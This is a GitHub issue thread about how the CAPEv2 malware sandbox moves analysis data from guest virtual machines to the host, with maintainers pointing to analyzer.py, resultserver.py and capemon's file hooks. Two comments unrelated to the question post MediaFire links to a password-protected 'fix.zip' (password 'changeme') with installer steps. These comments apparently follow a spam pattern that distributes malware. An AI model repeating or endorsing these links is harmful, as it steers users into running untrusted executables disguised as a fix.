### ISSUE TITLE
QA: How does Cape pull data from virtual machines ?

### ISSUE THREAD

**Issue by not-duckie** [kevoreilly/CAPEv2#2297]
## About accounts on [capesandbox.com](https://capesandbox.com/)
* Issues isn't the way to ask for account activation. Ping capesandbox in [Twitter](https://twitter.com/capesandbox) with your username

## This is open source and you are getting __free__ support so be friendly!

# Prerequisites

Please answer the following questions for yourself before submitting an issue.

- [x] I am running the latest version
- [x] I did read the README!
- [x] I checked the documentation and found no answer
- [x] I checked to make sure that this issue has not already been filed
- [x] I'm reporting the issue to the correct repository (for multi-repository projects)
- [x] I have read and checked all configs (with all optional parts)

I am reading the source for the project (am a bit lost), i want to understand how does cape pull data from virtual machines. I know capemon is used to generate log (syscall log and other stuff)  and that data is written to disk (after getting file name from `GetResultsPath` ). How is this data sent over to the cape.db or mongodb for processing.

Please help answer few questions
+ is the data synchronously sent over to the host machine in live time ?
+ how is data written to disk protected from ransomware samples being detonated in the sandbox ?
+ which module or source file is responsible for reciving the data and where is it stored before the processing/analyzing is run ?

Thank you for the project. I want to start contributing to the project but the code documentation is a bit lacking therefore starting a this issue. If there is a better way to talk about this project like (discord/slack/mattermost/matrix) please link me to that channel.

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by doomedraven** [comment]
Hey I'm on phone so partial answer
Check analyzer/windows/analyzer.py it does all what you looking for. Most files are streamed to host directly, some are submitted at the end of the job

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kevoreilly** [comment]
As doomed says, the data is streamed via pipes from analyzer in the guest to the results server on the host, for which the code is in ``lib/cuckoo/core/resultserver.py``. These are written to disk on the server side ready for processing in the ``storage/analyses/X`` subdirectory.

Since this data is not written to disk on the Windows side, there is no need to protect it from ransomware. However, there are still some files written to disk (such as unpacked payloads) that could be trashed - there is a limited protection from file api hooks here to help avoid this: see for example a hook such as that for ``FindFirstFileA`` in the hook source: ``https://github.com/kevoreilly/capemon/blob/capemon/hook_file.c``
